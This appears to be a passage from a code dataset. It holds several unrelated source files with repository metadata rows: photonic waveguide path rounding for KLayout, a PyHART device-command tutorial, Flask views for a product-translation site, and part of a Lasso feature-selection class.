return [self.P1, self.P2]
def get_length(self):
return (self.P2 - self.P1).norm()
def __repr__(self):
return "Line({P1}, {P2})".format(P1=self.P1, P2=self.P2)
def solve_Z(A, B, C, D, radius):
    """Round a Z-shaped double turn (both corners bend the same way).

    Returns (path_elements, remaining_points): a leading _Line plus two
    opposed _Arc elements, and the tail [Dprime, D] still to be routed.
    """
    from math import sin, pi, copysign

    AB = B - A
    BC = C - B
    CD = D - C
    # corner angles at B and C, measured against the middle segment
    α1 = angle_between(-BC, AB)
    α2 = angle_between(-BC, CD)
    # print("AB, BC, CD=", AB, BC, CD)
    # print("α1, α2=", degrees(α1), degrees(α2))
    γ = _solve_Z_angle(α1, α2, BC.norm(), radius)
    # print("γ=", degrees(γ))
    # unit vector between the two arc centers
    eX1X2 = rotate(-BC, -γ) / BC.norm()
    # print("eX1X2=", eX1X2)
    x = radius / BC.norm() * (1 - sin(abs(α1 - γ))) / sin(abs(α1))
    # print("x=", x)
    # X is the tangency point shared by the two arcs, on segment BC
    X = B + x * BC
    # print("X=", X)
    X1 = X - eX1X2 * radius
    X2 = X + eX1X2 * radius
    Aprime = X1 + rotate(X - X1, copysign(pi / 2, α1) + γ - α1)
    Dprime = X2 + rotate(X - X2, copysign(pi / 2, α2) + γ - α2)
    return (
        [_Line(A, Aprime), _Arc(Aprime, X1, X, α1 < 0), _Arc(X, X2, Dprime, α1 > 0)],
        [Dprime, D],
    )
def solve_U(A, B, C, D, radius):
    """Round a U-shaped double turn (the two corners bend opposite ways).

    Returns (path_elements, remaining_points) like solve_Z.
    """
    # TODO: known bug. This assumes that there is enough space between
    # A and B / C and D to perform the turn. Suggestion: if there isn't,
    # abort or move Eprime and Gprime accordingly.
    XB = bisect(A - B, C - B)
    XC = bisect(B - C, D - C)
    orientation = cross_prod(XB, XC) > 0  # positive if CCW waveguide turn
    # X: intersection of the two corner bisectors
    X = intersect(B, XB, C, XC)
    XB, XC = B - X, C - X
    Fprime = project(X, B, C)
    h = (Fprime - X).norm()
    # if h is too close to R, we will have extra unnecessary arcs
    # use two solve_3 with h as a radius instead
    if h >= radius - 0.001:
        solution1, rest_points = solve_3(A, B, C, h)
        solution2, rest_points = solve_3(rest_points[0], C, D, h)
        return solution1 + solution2, rest_points
    # F = X + (Fprime - X) * radius / h
    # Bprime = X + XB * radius / h
    # Cprime = X + XC * radius / h
    eAB = B - A
    eAB /= eAB.norm()
    eDC = C - D
    eDC /= eDC.norm()
    Eprime = project(X, A, B)
    Gprime = project(X, D, C)
    E = X + (Eprime - X) * radius / h
    G = X + (Gprime - X) * radius / h

    def compute_A_prime(E, Eprime, eAB):
        """Tangency point of the entry arc on the straight segment."""
        from math import sqrt
        D = (E - Eprime).norm()
        L = sqrt(D * (4 * radius - D))
        Aprime = Eprime - eAB * L
        return Aprime

    Aprime = compute_A_prime(E, Eprime, eAB)
    Dprime = compute_A_prime(G, Gprime, eDC)
    Asec = Aprime + (E - X)
    Dsec = Dprime + (G - X)
    # midpoints used as intermediate tangency points of the three arcs
    H = 0.5 * (Asec + X)
    II = 0.5 * (Dsec + X)
    return (
        [
            _Line(A, Aprime),
            _Arc(Aprime, Asec, H, not orientation),
            _Arc(H, X, II, orientation),
            _Arc(II, Dsec, Dprime, not orientation),
        ],
        [Dprime, D],
    )
def solve_2(A, B):
    """Base case: two points need no rounding, just a straight segment."""
    segment = _Line(A, B)
    return [segment], []
def solve_V(A, B, C, radius):
    """Round a single corner A-B-C with an arc tangent to both segments.

    The shorter leg determines the arc size; the longer leg keeps a
    straight remainder. Returns (path_elements, remaining_points).
    NOTE(review): `radius` is unused here — the arc radius comes from the
    projection distances rA/rC; confirm this is intentional.
    """
    XB = bisect(A - B, C - B)
    isCCW = cross_prod(C - B, A - B) > 0
    # project the endpoints onto the corner bisector through B
    Aprime = project(A, B, XB + B)
    Cprime = project(C, B, XB + B)
    rA = (A - Aprime).norm()
    rC = (C - Cprime).norm()
    if rA > rC:
        Csec = project(Cprime, A, B)
        return [_Line(A, Csec), _Arc(Csec, Cprime, C, isCCW)], []
    else:
        Asec = project(Aprime, B, C)
        return [_Arc(A, Aprime, Asec, isCCW)], [Asec, C]
def solve_3(A, B, C, radius):
    """Round the corner at B of the triplet A-B-C with a tangent arc.

    Returns (path_elements, remaining_points) where remaining_points starts
    at the arc's exit tangency point.

    Raises:
        ClearanceRewind: segment A-B is too short for the tangent arc.
        ClearanceForward: segment B-C is too short for the tangent arc.
    """
    from math import cos, pi

    p0, p1, p2 = A, B, C
    α = angle_between(p0 - p1, p2 - p1)
    if α % (2 * pi) == pi:
        # if points are collinear, just ignore middle point
        return ([], [p0, p2])

    # sometimes users pick len1 and len2 to be exactly 1 radius.
    # in that case, numerical errors might result in a ClearanceRewind
    # or ClearanceForward.
    # I am adding this 0.001 fix to correct that.
    clear = _min_clearance(α, radius - 0.001)
    len1 = (p1 - p0).norm()
    len2 = (p2 - p1).norm()
    if len1 < clear:
        raise ClearanceRewind()
    if len2 < clear:
        raise ClearanceForward()
    # unit vectors into and out of the corner
    e1 = (p1 - p0) / len1
    e2 = (p2 - p1) / len2
    arc_center = p1 + 0.5 * (-e1 * clear + e2 * clear) / cos(α / 2) ** 2
    return (
        [
            _Line(p0, p1 - e1 * clear),
            _Arc(p1 - e1 * clear, arc_center, p1 + e2 * clear, α > 0),
        ],
        [p1 + e2 * clear, p2],
    )
def solve_4(A, B, C, D, radius):
    """Route four points whose middle segment is too short for independent
    turns: Z-shaped when both corners bend the same way, U-shaped otherwise."""
    segment_in = B - A
    segment_mid = C - B
    segment_out = D - C
    turn_at_B = angle_between(-segment_mid, segment_in)
    turn_at_C = angle_between(-segment_mid, segment_out)
    if turn_at_B * turn_at_C > 0:
        return solve_Z(A, B, C, D, radius)
    return solve_U(A, B, C, D, radius)
def compute_rounded_path(points, radius):
    """Transforms a list of points into sections of arcs and straight lines.

    Approach:
        - Go through the list of points in triplets (A, B, C).
        - Call solve3 in (A,B,C), which returns a rounded path plus (Bprime, C)
        - Continue.
        - If solve3 cannot solve because AB is too short, raise a ClearanceRewind error
        - Conversely, if solve3 cannot solve because BC is too short, raise a ClearanceForward error
        - In the case of ClearanceForward, call solve4 on (A,B,C,D)
        - In the case of ClearanceRewind, call solve4 on (O,A,B,C), where O is the previous point

    Returns:
        - A list of _Line and _Arc objects
    """
    points_list = list(points)  # in case points_list is an iterator
    N = len(points_list)
    if N == 2:
        return [_Line(*points)]

    # Sanity checks
    assert N >= 3, "Insufficient number of points, N = {N} < 3".format(N=N)

    # Keep a one-step history so a ClearanceRewind can undo the previous
    # solve_3 and reprocess those points with solve_4.
    old_rounded_path = rounded_path = list()
    old_points_left = points_left = list(points)
    can_rewind = False
    while len(points_left) > 2:
        try:
            solution, rest_points = solve_3(*points_left[0:3], radius)
            old_points_left = points_left[:]
            points_left = rest_points + points_left[3:]
            can_rewind = True
        except ClearanceRewind:
            # cannot rewind twice in a row — the geometry is unsolvable
            if not can_rewind:
                raise RuntimeError(
                    "Not enough space for enough turns: Cannot solve:", *points_left[0:3]
                )
            points_left = old_points_left
            rounded_path = old_rounded_path
            if len(points_left[0:4]) < 4:
                raise RuntimeError(
                    "Not enough space for enough turns: Cannot solve:", *points_left[0:4]
                )
            solution, rest_points = solve_4(*points_left[0:4], radius)
            old_points_left = points_left[:]
            points_left = rest_points + points_left[4:]
            can_rewind = False
        except ClearanceForward:
            if len(points_left[0:4]) < 4:
                raise RuntimeError(
                    "Not enough space for enough turns: Cannot solve:", *points_left[0:4]
                )
            solution, rest_points = solve_4(*points_left[0:4], radius)
            old_points_left = points_left[:]
            points_left = rest_points + points_left[4:]
            can_rewind = False
        old_rounded_path = rounded_path[:]
        rounded_path += solution

    # there should be 2 points left in points_left
    solution, rest_points = solve_2(*points_left[0:2])
    rounded_path += solution
    points_left = rest_points + points_left[2:]
    assert len(points_left) == 0
    return rounded_path
class _Path:
""" Object holding path plus width information"""
def __init__(self, points, widths):
self.points = points
# This can be a single width or a list of widths, just like in layout_waveguide()
self.widths = widths
def layout(self, cell, layer):
layout_waveguide(cell, layer, self.points, self.widths, smooth=False)
def __repr__(self):
return "Path({point1}...{pointN}, {widths})".format(
point1=self.points[0], pointN=self.points[-1], widths=self.widths
)
class _Taper(_Path):
    """Linear width transition from w1 at P1 to w2 at P2."""

    def __init__(self, P1, P2, w1, w2):
        self.P1, self.P2 = P1, P2
        self.w1, self.w2 = w1, w2
        # expose the generic _Path interface
        self.points = [P1, P2]
        self.widths = [w1, w2]

    def __repr__(self):
        return f"Taper({self.P1}, {self.P2}, w1={self.w1}, w2={self.w2})"
def _compute_tapered_line(line, waveguide_width, taper_width, taper_length):
    """Split a _Line into taper / wide core / taper pieces.

    Lines shorter than a minimum length are returned untapered as a single
    constant-width _Path.
    """
    # don't bother tapering waveguides below this length
    minimum_length = 30 + 2 * taper_length
    P1, P2 = line.get_points()
    if line.get_length() < minimum_length:
        return [_Path([P1, P2], waveguide_width)]

    direction = P2 - P1
    direction /= direction.norm()
    entry_end = P1 + direction * taper_length
    exit_start = P2 - direction * taper_length
    return [
        _Taper(P1, entry_end, waveguide_width, taper_width),
        _Path([entry_end, exit_start], taper_width),
        _Taper(exit_start, P2, taper_width, waveguide_width),
    ]
def compute_untapered_path(path, waveguide_width):
    """Wrap every path element in a constant-width _Path."""
    untapered = []
    for element in path:
        untapered.append(_Path(element.get_points(), waveguide_width))
    return untapered
def compute_tapered_path(path, waveguide_width, taper_width, taper_length):
    """Convert lines/arcs to drawable paths, tapering long straight runs.

    Straight segments go through _compute_tapered_line; arcs stay at the
    nominal waveguide width.
    """
    result = []
    for element in path:
        if isinstance(element, _Line):
            result.extend(
                _compute_tapered_line(element, waveguide_width, taper_width, taper_length)
            )
        elif isinstance(element, _Arc):
            result.append(_Path(element.get_points(), waveguide_width))
    return result
def unique_points(point_list):
    """Drop consecutive points closer than 1e-4 to the last kept point."""
    if len(point_list) < 2:
        return point_list
    filtered = [point_list[0]]
    for candidate in point_list[1:]:
        if (candidate - filtered[-1]).norm() > 1e-4:
            filtered.append(candidate)
    return filtered
def layout_waveguide_from_points(
    cell, layer, points, width, radius, taper_width=None, taper_length=None
):
    """Lay out a rounded (optionally tapered) waveguide through `points`.

    If rounding fails, a thin 0.1-wide reference trace of the raw points is
    drawn instead so the error is visible in the layout. Returns `cell`.
    """
    assert radius > width / 2, "Please use a radius larger than the half-width"
    points = unique_points(points)
    if len(points) < 2:
        # Nothing to do
        return cell

    # First, get the list of lines and arcs
    try:
        rounded_path = compute_rounded_path(points, radius)
    except Exception as e:
        # best-effort fallback: report and draw the unrounded path
        print("ERROR:", e)
        print("Continuing...")
        layout_waveguide(cell, layer, points, 0.1)
        return cell

    # Taper path if necessary
    if taper_width is not None and taper_length is not None:
        waveguide_path = compute_tapered_path(rounded_path, width, taper_width, taper_length)
    else:
        waveguide_path = compute_untapered_path(rounded_path, width)

    # creating a single path
    # NOTE(review): `points` and `width` parameters are shadowed by the loop
    # variables below — the originals are no longer needed at this stage.
    _draw_points = []
    _draw_widths = []
    for element in waveguide_path:
        points, width = element.points, element.widths
        n_points = len(points)
        try:
            if len(width) == n_points:
                # per-point widths: use them directly
                _draw_points.extend(points)
                _draw_widths.extend(width)
            elif len(width) == 2:
                # taper: interpolate the width linearly along the points
                _draw_widths.extend(np.linspace(width[0], width[1], n_points))
                _draw_points.extend(points)
            else:
                raise RuntimeError("Internal error detected. Debug please.")
        except TypeError:
            # scalar width: replicate it for every point
            _draw_points.extend(points)
            _draw_widths.extend(np.ones(n_points) * width)

    # deleting repeated points
    _cur_point = None
    _draw_points2 = []
    _draw_widths2 = []
    for p, w in zip(_draw_points, _draw_widths):
        if _cur_point and p == _cur_point:
            continue
        _draw_points2.append(p)
        _draw_widths2.append(w)
        _cur_point = p

    layout_waveguide(cell, layer, _draw_points2, _draw_widths2, smooth=False)
    return cell
def main():
    """Demo: draw several rounded/tapered waveguides into waveguide_rounding.gds."""

    def trace_rounded_path(cell, layer, rounded_path, width):
        # flatten lines/arcs into one DPath for visual inspection
        points = []
        for item in rounded_path:
            points.extend(item.get_points())
        dpath = kdb.DPath(points, width, 0, 0)
        cell.shapes(layer).insert(dpath)

    def trace_reference_path(cell, layer, points, width):
        # the raw, unrounded control polygon for comparison
        dpath = kdb.DPath(points, width, 0, 0)
        cell.shapes(layer).insert(dpath)

    layout = kdb.Layout()
    TOP = layout.create_cell("TOP")
    layer = kdb.LayerInfo(10, 0)
    layerRec = kdb.LayerInfo(1001, 0)

    # unit vectors used to build test geometries
    ex, ey = kdb.DPoint(1, 0), kdb.DPoint(0, 1)

    # simple right-angle turn
    points = [0 * ex, 10 * ex, 10 * (ex + ey), 30 * ex]
    origin = 0 * ey
    points = [origin + point for point in points]
    x = compute_rounded_path(points, 3)
    trace_rounded_path(TOP, layer, x, 0.5)
    trace_reference_path(TOP, layerRec, points, 0.5)

    # zig-zag with a dip
    points = [0 * ex, 10 * ex, 5 * (ex - ey), 17 * ex, 30 * ex]
    origin = 30 * ey
    points = [origin + point for point in points]
    x = compute_rounded_path(points, 3)
    trace_rounded_path(TOP, layer, x, 0.5)
    trace_reference_path(TOP, layerRec, points, 0.5)

    # staircase patterns in both horizontal directions
    radius = 3
    for ex2 in (ex, -ex):
        points = [2 * ex2]
        for d in np.arange(1, 10, 2.5):
            origin = points[-1]
            displacements = [
                4 * radius * ex2,
                4 * radius * ex2 + d * ey - 1 * d * ex2,
                d * ey,
                (d + 2 * radius) * ey,
            ]
            points += [origin + displacement for displacement in displacements]
        origin = 15 * ex + 40 * ey
        points = [origin + point for point in points]
        x = compute_rounded_path(points, radius)
        trace_rounded_path(TOP, layer, x, 0.5)
        trace_reference_path(TOP, layerRec, points, 0.5)

    # Layout tapered waveguide
    points = [
        0 * ex,
        100 * ex,
        100 * ex + 20 * ey,
        10 * ex + 5 * ey,
        10 * ex + 25 * ey,
        100 * ex + 30 * ey,
    ]

    # Untapered
    origin = 40 * ex
    points_ = [origin + point for point in points]
    layout_waveguide_from_points(TOP, layer, points_, 0.5, 5)

    # Tapered
    origin = 40 * ex + 40 * ey
    points_ = [origin + point for point in points]
    layout_waveguide_from_points(TOP, layer, points_, 0.5, 5, taper_width=3, taper_length=10)

    print("Wrote waveguide_rounding.gds")
    TOP.write("waveguide_rounding.gds")
# Run the demo only when executed directly, not on import.
if __name__ == "__main__":
    main()
| 29.744783 | 128 | 0.585667 | 2,641 | 18,531 | 3.957592 | 0.159031 | 0.029659 | 0.004305 | 0.013395 | 0.237467 | 0.199101 | 0.153272 | 0.135668 | 0.128205 | 0.119786 | 0 | 0.035761 | 0.295289 | 18,531 | 622 | 129 | 29.792605 | 0.764607 | 0.162431 | 0 | 0.210396 | 0 | 0 | 0.032665 | 0.00449 | 0 | 0 | 0 | 0.001608 | 0.014851 | 1 | 0.084158 | false | 0.004951 | 0.032178 | 0.019802 | 0.220297 | 0.007426 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
419209cfa7ba87d275b63ba33aa6f02f592a320e | 3,616 | py | Python | PyHART_tutorial/05_device_specific_commands_for_DDS.py | wdehoog/PyHART | abe410e45d66710f65d5499165aab066c9ad9fa3 | [
"MIT"
] | null | null | null | PyHART_tutorial/05_device_specific_commands_for_DDS.py | wdehoog/PyHART | abe410e45d66710f65d5499165aab066c9ad9fa3 | [
"MIT"
] | null | null | null | PyHART_tutorial/05_device_specific_commands_for_DDS.py | wdehoog/PyHART | abe410e45d66710f65d5499165aab066c9ad9fa3 | [
"MIT"
] | null | null | null | #
# In this module is shown how to send a command to an HART device.
# Encode/decode data, logging and manage responses codes.
#
'''
-------------------------------------------------------------------------------
SAME CODE OF EXAMPLE 01 - IGNORE THIS SECTION
This is included to test the example
-------------------------------------------------------------------------------
'''
#
# Standard import. Append the path of PyHART. Since this file is in the folder PyHART_tutorial,
# just go back one folder.
#
import sys
sys.path.append('../')
from PyHART.COMMUNICATION.CommCore import *
from PyHART.COMMUNICATION.Types import *
from PyHART.COMMUNICATION.Utils import *
from PyHART.COMMUNICATION.Common import *
#
# Procedure to list communication ports
#
count, listOfComPorts = ListCOMPort(True)
comport = None
selection = 0
# Keep asking until a valid port is chosen; entry (count + 1) means "quit".
while (comport == None) and (selection != (count + 1)):
    print('\nSelect the communication port.')
    print('Insert the number related to your choice and press enter.')
    try:
        selection = int(input())
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/EOFError;
        # any non-numeric input is treated as "ask again".
        selection = 0

    if (selection == (count + 1)):
        print('Leaving application...')
        sys.exit()

    # returns None for an out-of-range selection, which keeps the loop going
    comport = GetCOMPort(selection, listOfComPorts)
#
# Instantiates and starts the communication object
#
hart = HartMaster(comport, \
                  MASTER_TYPE.PRIMARY, \
                  num_retry = 2, \
                  retriesOnPolling = False, \
                  autoPrintTransactions = True, \
                  whereToPrint = WhereToPrint.BOTH, \
                  logFile = 'terminalLog.log', \
                  rt_os = False, \
                  manageRtsCts = None)
# Start() must be called before any command is sent; Stop() at the end.
hart.Start()
#
# Polling connected devices in range [0..EndPollingAddress] and
# print identification data of the first device found.
#
FoundDevice = None
pollAddress = 0
EndPollingAddress = 3
# Stop at the first address that answers, or after EndPollingAddress tries.
while (FoundDevice == None) and (pollAddress < EndPollingAddress):
    CommunicationResult, SentPacket, RecvPacket, FoundDevice = hart.LetKnowDevice(pollAddress)
    pollAddress += 1

if (FoundDevice is not None):
    PrintDevice(FoundDevice, hart)
else:
    print ('Device not found. Leaving Application...')
    sys.exit()
'''
-------------------------------------------------------------------------------
END OF EXAMPLE 01 CODE
-------------------------------------------------------------------------------
'''
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Command 240 (device-specific): request data payload is a single slot byte.
#
# Send command 240 with slot 8
retStatus, CommunicationResult, SentPacket, RecvPacket = HartCommand(hart, 240, bytearray([8]))

# Send command 240 with slot 26
retStatus, CommunicationResult, SentPacket, RecvPacket = HartCommand(hart, 240, bytearray([26]))
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Command 79 Simulation Enable
#
# Request frame layout (8 bytes):
#   [0] slot, [1] enable flag, [2] unit code, [3:7] simulated value (float),
#   [7] status
slot = 0  # Pressure
simulationEnable = 1  # enable
unit = GetUnitCode('Kilopascal')
status = 0
txdata = bytearray(8)
txdata[0] = slot
txdata[1] = simulationEnable
txdata[2] = unit
# FIX: the original assigned FloatToBytearray(...) to txdata[3:6] (3 slots).
# Assuming the float serializes to 4 bytes, that slice assignment grew the
# frame to 9 bytes and shifted the status byte out of position. The float
# occupies bytes 3..6 inclusive, i.e. slice [3:7].
txdata[3:7] = FloatToBytearray(34.734)
txdata[7] = status
retStatus, CommunicationResult, SentPacket, RecvPacket = HartCommand(hart, 79, txdata)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Command 79 Simulation Disable
#
# Same 8-byte layout as above, with the enable flag cleared and a zero value.
txdata = bytearray([slot, not simulationEnable, unit, 0, 0, 0, 0, 0])
retStatus, CommunicationResult, SentPacket, RecvPacket = HartCommand(hart, 79, txdata)

#
# Kills all threads
#
hart.Stop()
| 29.16129 | 97 | 0.555586 | 334 | 3,616 | 6.002994 | 0.45509 | 0.072319 | 0.097257 | 0.095761 | 0.167581 | 0.145636 | 0.145636 | 0.145636 | 0 | 0 | 0 | 0.022636 | 0.242533 | 3,616 | 123 | 98 | 29.398374 | 0.709383 | 0.268529 | 0 | 0.105263 | 0 | 0 | 0.082375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.087719 | 0 | 0.087719 | 0.070175 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4192d1cec463e5f4665e763436ee29fbd56e053f | 9,315 | py | Python | productporter/product/views.py | kamidox/weixin_producthunt | 24269da93e75374ee481b1b78257b18abda4d0c7 | [
"BSD-3-Clause"
] | 10 | 2015-01-07T06:01:13.000Z | 2021-02-14T09:11:10.000Z | productporter/product/views.py | kamidox/weixin_producthunt | 24269da93e75374ee481b1b78257b18abda4d0c7 | [
"BSD-3-Clause"
] | 3 | 2015-01-01T09:56:04.000Z | 2015-01-06T01:34:44.000Z | productporter/product/views.py | kamidox/weixin_producthunt | 24269da93e75374ee481b1b78257b18abda4d0c7 | [
"BSD-3-Clause"
] | 5 | 2015-01-01T10:31:50.000Z | 2018-03-09T05:22:16.000Z | #!/bin/env python
# -*- coding: utf-8 -*-
"""
productporter.product.views
~~~~~~~~~~~~~~~~~~~~~~~~~
product blueprint
:copyright: (c) 2014 by the ProductPorter Team.
:license: BSD, see LICENSE for more details.
"""
import datetime
import json
from flask import Blueprint, request, current_app, flash, redirect, \
url_for, jsonify, make_response
from flask.ext.login import current_user
from qiniu import Auth
from productporter.product.phapi import ProductHuntAPI
from productporter.product.models import Product, Tag
from productporter.utils.helper import render_template, pull_and_save_posts, render_markup, \
query_products, can_translate, can_review, is_online
from productporter.utils.decorators import moderator_required
from productporter.user.models import User
product = Blueprint('product', __name__)
def _tag_names(post):
"""return tag names of this post"""
tagnames = []
for tag in post.tags:
if len(tagnames) == 0:
tagnames.append(tag.name)
else:
tagnames.append('; ' + tag.name)
return ''.join(tagnames)
def _render_tags(post):
"""render tags. MUST BE THE SAME of macro 'render_tags' in macro.jinja.html"""
tag_template = '<a class="label label-default" href="%s">%s</a>'
tag_html = []
for tag in post.tags:
tag_html.append(tag_template % \
(url_for('product.tags', tag=tag.name), tag.name))
tag_html.append('<br/><br/>')
return '\n'.join(tag_html)
def _render_contributors(contributers, postid, locked_by, field):
"""render contributors, MUST BE THE SAME of macro 'contributors' in macro.jinja.html"""
div_template = "<div class='translaters-list' data-postid='%s' field='%s'>edit by %s</div>"
user_template = "<a href='%s'>@%s</a>"
user_htmls = []
users = contributers.all()
for user in users:
nickname = user.nickname if user.nickname else user.username
user_htmls.append(user_template % \
(url_for('user.profile', username=user.username), nickname))
if locked_by:
nickname = locked_by.nickname if locked_by.nickname else locked_by.username
user_htmls.append((' - locked by ' + user_template) % \
(url_for('user.profile', username=locked_by.username), nickname))
return div_template % (postid, field, '\n'.join(user_htmls))
def _post_aquire_translate(request):
"""aquire to translate post"""
postid = request.args.get('postid')
field = request.args.get('field', 'ctagline')
current_app.logger.info('aquire translate %s for post %s' % (field, str(postid)))
if not can_translate(current_user):
ret = {
'status': 'error',
'postid': postid,
'error': 'Please sign in first'
}
return make_response(jsonify(**ret), 401)
post = Product.query.filter(Product.postid==postid).first_or_404()
if getattr(post, field + '_locked'):
ret = {
'status': 'error',
'postid': postid,
'error': '%s is locked. Please contact adminitrator.'
}
return make_response(jsonify(**ret), 403)
editing_user = getattr(post, 'editing_' + field + '_user')
if (editing_user) and \
(editing_user.username != current_user.username) and \
(is_online(editing_user)):
ret = {
'status': 'error',
'postid': post.postid,
'error': '%s is editing by %s' % \
(field, editing_user.username)
}
return make_response(jsonify(**ret), 400)
setattr(post, 'editing_' + field + '_user_id', current_user.id)
post.save()
ret = {
'status': 'success',
'postid': post.postid,
'field': field,
'value': getattr(post, field),
'tags': _tag_names(post)
}
return jsonify(**ret)
# translate detail
@product.route('/translate', methods=["GET", "PUT", "POST"])
def translate():
"""
use GET to aquire translation
use PUT/POST to commit translation
:param postid: The postid of product
:param field: The field of operation, could be 'ctagline' or 'cintro'
:param value: The value of translate field
"""
if request.method == 'GET':
return _post_aquire_translate(request)
jsondata = None
try:
jsondata = json.loads(request.data)
except ValueError:
ret = {
'status': 'error',
'message': "invalid json data"
}
return make_response(jsonify(**ret), 405)
postid = jsondata['postid']
field = jsondata['field']
if not can_translate(current_user):
ret = {
'status': 'error',
'postid': postid,
'field': field,
'error': 'Please sign in first'
}
return make_response(jsonify(**ret), 401)
post = Product.query.filter(Product.postid==postid).first_or_404()
try:
canceled = jsondata['canceled']
if canceled:
setattr(post, 'editing_' + field + '_user_id', None)
post.save()
ret = {
'status': 'success',
'postid': post.postid,
'field': field
}
return jsonify(**ret)
except KeyError:
pass
current_app.logger.info('commit %s for post %s' % (field, str(postid)))
# deal with tags
if field == 'ctagline':
post.set_tags(jsondata['tags'])
# deal with other filed data
setattr(post, field, jsondata['value'])
setattr(post, 'editing_' + field + '_user_id', None)
post.save()
getattr(current_user, 'add_' + field + '_product')(post)
ret = {
'status': 'success',
'postid': post.postid,
'field': field,
'value': render_markup(getattr(post, field)),
'contributors': _render_contributors( \
getattr(post, field + '_editors'), post.postid, \
getattr(post, field + '_locked_user'), field),
'tags': _render_tags(post)
}
return jsonify(**ret)
# posts list
@product.route('/', methods=["GET"])
def index():
""" product posts home dashboard """
return redirect(url_for('product.posts'))
# posts list
@product.route('/posts/', methods=["GET"])
def posts():
""" product posts home dashboard """
spec_day = request.args.get('day', '')
day, posts = query_products(spec_day)
post_count = len(posts)
tags = Tag.names()
return render_template('product/posts.jinja.html',
post_count=post_count, posts=posts, day=day, tags=tags)
# posts list
@product.route('/posts/<postid>', methods=["GET"])
def post_intro(postid):
""" product detail information page """
post = Product.query.filter(Product.postid==postid).first_or_404()
tags = Tag.names()
return render_template('product/post_intro.jinja.html', post=post, tags=tags)
#pull products
@product.route('/pull')
def pull():
""" pull data from producthunt.com """
day = request.args.get('day', '')
count = pull_and_save_posts(day)
return "pulled %d posts " % (count)
@product.route('/lock', methods=['GET'])
@moderator_required
def lock():
"""
lock product
:param postid: The postid of product
:param op: Operation, clould be 'lock' or 'unlock'
:param field: Field, could be 'ctagline' or 'cintro'
"""
postid = request.args.get('postid', '')
op = request.args.get('op', 'lock')
field = request.args.get('field', 'ctagline')
post = Product.query.filter(Product.postid==postid).first_or_404()
if op.lower() == 'lock':
setattr(post, field + '_locked', True)
setattr(post, field + '_locked_user_id', current_user.id)
op = 'Unlock'
else:
setattr(post, field + '_locked', False)
setattr(post, field + '_locked_user_id', None)
op = 'Lock'
post.save()
ret = {
'status': 'success',
'postid': post.postid,
'contributors': _render_contributors( \
getattr(post, field + '_editors'), post.postid, \
getattr(post, field + '_locked_user'), field)
}
return jsonify(**ret)
@product.route('/tags/', methods=["GET"])
def tags():
"""show all products"""
return "under construction"
@product.route('/tags/<tagname>', methods=["GET"])
def tags_name(tagname):
"""show all products by selected tag"""
return "under construction"
@product.route('/dailybriefing/<day>', methods=['GET'])
@moderator_required
def dailybriefing(day):
""" Generate daily briefing """
qday, posts = query_products(day)
post_count = len(posts)
# Thanks to contributors
editors = []
for post in posts:
if post.ctagline and post.ctagline_locked:
editors += post.ctagline_editors
# Thank once is enough
editors = {}.fromkeys(editors).keys()
return render_template('product/dailybriefing.jinja.html',
post_count=post_count, posts=posts, day=qday, editors=editors)
@product.route('/qiniutoken', methods=['GET'])
def get_qiniu_token():
q = Auth(current_app.config["QINIU_ACCESS_KEY"], current_app.config["QINIU_SECRET_KEY"])
token = q.upload_token(current_app.config["QINIU_BUCKET"])
ret = {'uptoken': token}
return jsonify(**ret)
| 32.231834 | 95 | 0.615137 | 1,099 | 9,315 | 5.070974 | 0.196542 | 0.019379 | 0.017585 | 0.02243 | 0.362462 | 0.258748 | 0.219271 | 0.171541 | 0.164364 | 0.1274 | 0 | 0.004664 | 0.240365 | 9,315 | 288 | 96 | 32.34375 | 0.782928 | 0.122061 | 0 | 0.338164 | 0 | 0.004831 | 0.152599 | 0.013589 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067633 | false | 0.004831 | 0.048309 | 0 | 0.217391 | 0.009662 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
419429d46af11923cde1d968263d403240c3dfee | 2,241 | py | Python | clintk/cat2vec/feature_selection.py | DITEP/db-cleansing | 9a2360d45bc250b9b1ec73ba7efc2d14b3250c74 | [
"MIT"
] | 5 | 2019-04-19T05:45:20.000Z | 2021-11-16T13:22:07.000Z | clintk/cat2vec/feature_selection.py | DITEP/db-cleansing | 9a2360d45bc250b9b1ec73ba7efc2d14b3250c74 | [
"MIT"
] | null | null | null | clintk/cat2vec/feature_selection.py | DITEP/db-cleansing | 9a2360d45bc250b9b1ec73ba7efc2d14b3250c74 | [
"MIT"
] | null | null | null | """
selects parameters with L1 logistic regression
"""
import pandas as pd
from sklearn.base import BaseEstimator
class LassoSelector(BaseEstimator):
"""
This class is made to be used after cat2vec.lasso_gridsearch since it
selects the features from a dataframe that have the most weighted
coefficients (according to a L1-penalized linear model)
It inherits from sklearn.base.BaseEstimator to allow gridsearching the
best `n_features` using a pipeline and a basline classifier
Parameters
----------
n_features : int
number of top features to keep
lasso_coefs : pd.DataFrame
each row is the name of a category and its coef weight in LASSO
model
feature_col : str
name of the feature col (ie name of the categorical variable)
coef_col : str
name of the column of the LASSO coefficients in lasso_coefs dataframe
Examples
--------
>>> dico = {'coef': [0, 4.5, 1.2, 0.3], \
'colnames': ['feat1', 'feat2', 'feat3', 'feat4']}
>>> df = pd.DataFrame(dico)
keeps only feat2 and feat3
